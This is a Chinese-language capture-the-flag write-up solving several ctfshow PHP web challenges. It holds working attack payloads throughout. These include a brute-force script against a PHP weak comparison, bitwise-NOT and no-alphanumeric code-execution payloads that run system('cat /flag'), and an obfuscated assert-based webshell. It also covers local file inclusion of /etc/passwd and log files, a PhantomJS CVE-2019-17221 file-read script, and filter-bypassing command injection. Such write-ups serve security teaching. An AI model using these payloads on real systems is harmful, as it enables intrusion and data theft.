ctfshow-36D杯
给你shell
($obj['secret'] != $flag_md5 ) ? haveFun($flag) : echo "here is your webshell: $shell_path";
这是个弱比较,输入?give_me_shell前三个是0说明二进制小于1000000就是ASCII的64,
0-32是不可见或非打印字符),它们用于控制字符设备、打印机等设备的行为。
32-64是数字和一些字符
所以判断前三个是数字,是数字就若比较就只比较数字了(PHP)
所以爆破
import requests
url="http://6edac18b-df54-486f-81f2-dd6630be78bf.challenge.ctf.show/index.php?give_me_shell"
for i in range(1,1000):headers = {'cookie': 'secret={"secret": ' + str(i) + '}'}res = requests.post(url, headers=headers)if "0006464640064064646464006406464064640064006400000000000" not in res.text:print(headers['cookie'])break
$;^f/*&),`"'都没了
用脚本取反
<?php
$str = "/flag"; // 直接写入字符串,不需要空格分隔
echo "~";
foreach (str_split($str) as $char) { // 使用 str_split 将字符串按字符分割echo "%" . bin2hex(~$char); // 取字符的 ASCII 值,按位取反并转为十六进制
}
?>
?code=]=123?><?=require~%d0%99%93%9e%98?>
你没见过的注入
有提示
-
登陆不上去找txt
去robots.txt
/pwdreset.php有重置密码的页面,真后门
然后是个文件上传,传了个txt文件,看后边的type是
你取吧
源码就是个直接的rce,过滤了字母和俩符号
法一
利用原有的数组进行rce
?code=`$_[2]$_[0]$_[19] /$_[5]$_[13]$_[0]$_[6]`
法二
无数字字母rce
/GET
?code=1);$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);(1
/POST
_=system('cat /flag');
法三
读取提示
?code=${$_{7}.$_{8}.$_{12}.$_{19}}
下载压缩包和解密脚本然后就解出一个码
?><?php @eval("//Encode by phpjiami.com,Free user."); ?><?php
$ch = explode(".","hello.ass.world.er.rt.e.saucerman");
$c = $ch[1].$ch[5].$ch[4];
@$c($_POST[7-1]);
?>
<?php
hint.php拿shell
ALL_INFO_U_WANT
visit all_info_u_want.php and you will get all information you want
= =Thinking that it may be difficult, i decided to show you the source code:
<?php
error_reporting(0);
//give you all information you want
if (isset($_GET['all_info_i_want'])) {phpinfo();
}
if (isset($_GET['file'])) {$file = "/var/www/html/" . $_GET['file'];//really baby includeinclude($file);
}
?>
really really really baby challenge right?
扫描出index.php.bak,这个跟题目也不符合啊,要↓才出文件,这是要猜啊
/all_info_u_want.php?file=../../../../etc/passwd
,直接日志文件包含
1=system('grep -r "ctfshow" /etc');出flag
RemoteImageDownloader
进行访问的时候看响应头PhantomJS/2.1.1,有个CVE-2019-17221
https://github.com/h4ckologic/CVE-2019-17221/blob/master/PhantonJS_Arbitrary_File_Read.pdf
上👆写的很详细的,payload也给了
<html><head><body><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///flag");x.send();</script></body></head>
</html>
WUSTCTF朴实无华Revenge
一
num="-0",反转后的字符串是"0-"。intval("-0")=0,intval("0-")=0。所以$numPositve === $numReverse(0 === 0),同时原字符串"-0"不是回文。所以满足条件。
或者?num=0.001.0
或者6.60
二
弱比较,0e开头并且双md5之后还是0e开头的字符串
0e1138100474
三
get[flag=nl</flag
WUSTCTF朴实无华Revenge_Revenge
?num=0.00&md5=0e1138100474&get[flag=c\at%09flag.p\hp ?num=0.00&md5=0e1138100474&get[flag=c\at<flag.p\hp
参考
https://www.shawroot.cc/848.html#0x05_WUSTCTF_pu_shi_wu_hua_Revenge_Revenge
https://www.cnblogs.com/phant0m/articles/16533285.html
